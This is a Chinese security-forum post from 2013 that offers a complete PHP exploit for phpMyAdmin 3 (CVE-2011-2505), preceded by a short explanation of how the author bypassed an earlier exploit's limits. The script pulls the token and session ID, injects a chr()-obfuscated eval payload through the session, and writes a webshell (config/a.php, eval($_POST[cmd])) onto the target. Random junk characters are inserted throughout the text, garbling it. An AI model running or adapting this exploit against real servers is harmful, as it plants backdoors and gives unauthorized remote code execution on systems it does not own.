最近在家做专职奶爸,不谙圈内事很多months了,博客也无更新。' c; [1 R: H: q4 c9 z5 E/ J
0 X% [* c9 x$ N, ~9 G% Q; R昨夜带孩子整夜未眠,看到黑哥在php security群里关于phpmyadmin3漏洞的讨论,虽然之前没看过漏洞代码,不过前段时间还是在微博上看到wofeiwo的exp了,不过据黑哥说有不鸡肋的利用方法,于是夜里翻代码出来研究了翻,写出了这个冷饭exp,由于我搞的晚了,之前已经很多人研究了写exp了,于是我这个属于炒冷饭,权当研究研究打发时间了。* `- P% z4 j# E2 w" f* D
1 R5 l [& I4 _ y首先赞下wofeiwo的python版本的exp,再赞下wofeiwo跟superhei的钻研精神,学习的榜样啊。不过之前那个exp利用起来是有一些限制的:" \. E( D" R, w" h- W- ?$ I
一是session.auto_start = 1;
8 l6 P7 M% K* W7 v& m二是pma3默认代码里libraries目录已经用.htaccess控制了不允许访问。 |: m4 f0 \. d) q) r
当然还有第三点大家都不可以逾越的鸿沟:config目录存在且可写。
0 k+ u1 H/ U3 h2 b# q3 [& X- M1 E) \
在群里看了黑哥的发言后,再看了下代码,发现前两点利用限制均可以无视。所以其实这个漏洞还真的可以不是那么鸡肋。
, ]* N) L/ f' y- I6 K" c% u9 ]- j6 V: `4 X' z
于是写了这个php版本的exp,代码如下:
7 J+ l4 D4 }% [: R, J) z. |5 c% G/ l. v+ F4 P; F J2 ]2 `; A
#!/usr/bin/php a! P# E5 v4 L$ [0 o# i! |1 v
<?php
, n/ Y) U% b _print_r('
& Y' h; H I2 b6 k0 o: @+---------------------------------------------------------------------------++ u) }, N1 _5 m) ?2 O2 v1 D
pma3 - phpMyAdmin3 remote code execute exploit [Not jilei(chicken\'s ribs)]
0 O2 P. S6 O; ]' [by oldjun(www.oldjun.com)
7 A( O8 D' s1 V' ~9 T& vwelcome to www.t00ls.net
2 i+ j/ \7 F! U% t* Amail: oldjun@gmail.com% f4 c: u% T+ `* L @
Assigned CVE id: CVE-2011-2505
2 l' w: B! k, r8 E+---------------------------------------------------------------------------+. W/ U8 `; c6 W- m9 G# L8 M m
');7 c8 }& p1 l6 I$ q
" C3 ]& v( M! a/**
7 g* R- i; _; s: W8 x * working when the directory:"config" exists and is writeable.
5 k; H7 v/ p' y1 i**/+ n% y @1 h- b+ i/ N" E# ~ M3 f
8 `" s- Y. X& }) m6 ]1 n2 J
if ($argc < 3) {
`; a }" {8 X( I! L3 V2 t- t print_r('
1 m! p$ r8 l: v/ {" i5 S& ~+ l+---------------------------------------------------------------------------+2 M9 d) r& s3 L G. B0 Z' H. l
Usage: php '.$argv[0].' host path ^0 s0 V* l, `5 U+ F0 F2 s
host: target server (ip/hostname)
3 d" [ I! h0 {) d, ^9 kpath: path to pma3, P X* M$ Q; f
Example:
# p' ]! g+ v- g9 \- l8 e# ~php '.$argv[0].' localhost /pma/! N( m. j* M1 P" H! B9 z. i/ m6 e! _
+---------------------------------------------------------------------------+( O+ Q8 v# f1 ]! @6 I
');
# V6 W( r ^( R3 B, [1 R v# D exit;
+ E; X5 v, F) g* g4 V}' D& g( r- j" I( O2 F: [
4 x! B x7 @* c1 W: K' ?; t
$host = $argv[1];* q9 Y1 K4 T }! C) U f: W
$path = $argv[2];
, c7 n: w5 f1 J7 ]! S, j# {& {3 k/ C" z( F$ p4 i4 ?/ ]
/**
. Z" D1 f7 }& y8 Y * Try to determine if the directory:"config" exists2 ~" F% t$ t; B+ }2 ], U. ^
**/2 u/ G0 ~3 C7 I
echo "[+] Try to determine if the directory:config exists....\n";* i9 v5 U7 e+ r: o
$returnstr=php_request('config/');3 R$ ?9 A" {% Y: t% r, ] F8 f8 ]3 w; q
if(strpos($returnstr,'404')){$ y; Y9 f* c2 h
exit("[-] Exploit Failed! The directory:config do not exists!\n");
! m/ X) A3 S' r7 ~}
! i! H3 ^3 K f* z
, q& y$ z/ ?; |- x) h& Q0 P4 X/**) L8 ]* n, t- Y" @7 W: q
* Try to get token and sessionid
, O) N# y& S" b0 n% ?' B9 g**/9 p! |8 ~' y7 d
echo "[+] Try to get token and sessionid....\n";
0 [9 A9 s% k+ O S1 m$result=php_request('index.php');
7 P8 O' O3 \9 b8 vpreg_match('/phpMyAdmin=(\w{32,40})\;(.*?)token=(\w{32})\&/s', $result, $resp);0 [7 J7 r7 d( v& F4 f: u4 Y
$token=$resp[3];( S3 S# ?9 G+ J: ]& N. G: M
$sessionid=$resp[1];
0 b$ i$ o4 n$ w; lif($token && $sessionid){; t0 @% x& r' P
echo "[+] token token\n";' X: z; H: B- @8 L& Y5 u. S0 d s
echo "[+] Session IDsessionid\n";6 \7 N. t' n+ J# ?- E. f
}else{: g( D% v% l( \' j2 V% q
exit("[-] Can't get token and Session ID,Exploit Failed!\n");
1 z# q8 |* O5 q: Z$ k$ `}" m, p! @7 W6 G8 c; d; Z
1 Y0 X+ l& H8 B% i
/**
! i3 O8 _0 L( ?. L3 [ x7 H3 d * Try to insert shell into session
( {# s2 z& E/ I- |1 }9 K**/ p: p3 m: P6 a. ?& T; w6 _8 {% O
echo "[+] Try to insert shell into session....\n";
1 \" `9 O+ H7 E- k1 gphp_request('db_create.php?token='.$token.'&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][*/eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59).chr(101).chr(99).chr(104).chr(111).chr(40).chr(39).chr(116).chr(48).chr(48).chr(108).chr(115).chr(39).chr(41).chr(59));/*][host]=t00ls.net','','phpMyAdmin='.$sessionid);//Actually,almost all the php files in home directory of pma3 can be used here.
8 l% @* J& I: x5 G1 J8 \7 T% C/ R6 A- ^ U L
/**& V2 @- N0 ~# L4 g
* Try to create webshell
1 `/ u b n: w' n' n; |% ^0 u* a**/1 p5 Q8 _# y' s% a8 K/ \
echo "[+] Try to create webshell....\n";) e, _) W/ V( P' `3 H
php_request('setup/config.php','phpMyAdmin='.$sessionid.'&tab_hash=&token='.$token.'&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save','phpMyAdmin='.$sessionid);
) k4 F2 Y( l2 M" V/**; i' N# c* y, f8 S" S) g7 A: P8 R
* Try to check if the webshell was created successfully! h' w o5 N Y7 [ O2 ? P* o( \
**/! A( l r% r, y1 H. M
echo "[+] Try to check if the webshell was created successfully....\n";8 A# C# O9 g7 F0 m/ o, _
$content=php_request('config/config.inc.php');4 m' L: Z J$ [0 Q) E5 n9 w: z
if(strpos($content,'t00ls')){( r$ i0 T* { M$ f3 Q6 o$ ]2 e! J
echo "[+] Congratulations! Expoilt successfully....\n";
M2 i0 @! a+ m% S5 k8 g echo "[+] Webshell:http://$host{$path}config/a.php eval(\$_POST[cmd])\n";# I* C2 B" M7 y: l
}else{! Q5 C2 W E, r5 q4 l3 }! Q
exit("[-] Exploit Failed! Perhaps the directory:config do not exists or is not writeable!\n");9 h8 ]! h# m% ~9 H; ~9 N" r
}
# o S( N9 s, b7 I2 W/ @8 U8 K
, C2 R: y, g7 I( V1 H Y9 B. F$ zfunction php_request($url,$data='',$cookie=''){( G" X6 @$ w# D- a# c+ g
global $host, $path;! f$ r8 z. K L
* T! D0 H5 Z2 [7 c# r
$method=$data?'POST':'GET';
- d$ I, c- P! T5 V$ Y) v# h. ~ : m& ?1 S) X0 R, S1 ~; b8 z% y
$packet = $method." ".$path.$url." HTTP/1.1\r\n";; [. |- r( M, S8 @: r4 e
$packet .= "Accept: */*\r\n";
: D' v% l+ G8 V $packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";3 l" W/ \5 }0 r6 C% z6 y. W
$packet .= "Host: $host\r\n";
& \3 V+ P% q/ G7 f' [1 f $packet .= $data?"Content-Type: application/x-www-form-urlencoded\r\n":"";
& Q& K: v0 D. i/ J& ^5 y $packet .= $data?"Content-Length: ".strlen($data)."\r\n":"";! P8 R( T7 _* P6 O [8 q l* r
$packet .= $cookie?"Cookie: $cookie\r\n":"";# m3 R: E9 }* v& v+ B7 n) U1 u* V
$packet .= "Connection: Close\r\n\r\n";, g3 v% V: t6 l7 d* V0 y
$packet .= $data?$data:"";
& X! K- u9 x- c/ ? G+ I& D
4 e: G( F% W) l2 n1 X $fp = fsockopen(gethostbyname($host), 80);
1 A4 W" z" g# X& I/ F; Q. f- W5 i if (!$fp) {
4 ~/ [( C X1 p, p6 s. q echo 'No response from '.$host; die;
* n* l7 | B9 |8 _+ G& | }! |/ k4 W, I8 T! V8 J
fputs($fp, $packet);+ p' B/ \0 c- D
4 i* g9 a }) T- o
$resp = '';; A, h& C$ J. |! T' g( P' }
/ q! x. j. l, j. r
while ($fp && !feof($fp))
5 P( s1 O; A& b$ ^, H $resp .= fread($fp, 1024);
: `! Y, A0 j: I+ s. z
& n1 V h# |) B! v* i* q9 k return $resp;
! v" N F2 L |' d8 \} J5 J' A) K! E2 o# ]
/ o \9 o3 e' s9 v
?>
; }* o# Z7 n' `; }9 D4 T. |
发表于 2013-2-21 09:13:03
收藏
支持
反对